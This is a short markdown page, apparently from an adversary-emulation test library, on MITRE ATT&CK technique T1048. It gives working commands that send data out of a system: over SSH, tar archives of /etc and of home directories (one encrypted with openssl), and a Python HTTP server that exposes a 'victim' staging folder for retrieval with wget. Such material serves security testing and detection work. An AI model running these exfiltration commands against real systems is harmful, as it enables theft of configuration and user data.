Skip to content

Latest commit

 

History

History
31 lines (17 loc) · 834 Bytes

Exfiltration_Over_Alternative_Protocol.md

File metadata and controls

31 lines (17 loc) · 834 Bytes

Exfiltration Over Alternative Protocol

MITRE ATT&CK Technique: T1048

SSH

Remote to Local:

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Local to Remote:

tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh [email protected] 'cat > /home.tar.gz.enc'

HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Victim System Configuration:

mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

Using Python to establish a one-line HTTP server on victim system:

cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337

To retrieve the data from an adversary system:

wget http://VICTIM_IP:1337/victim-file.txt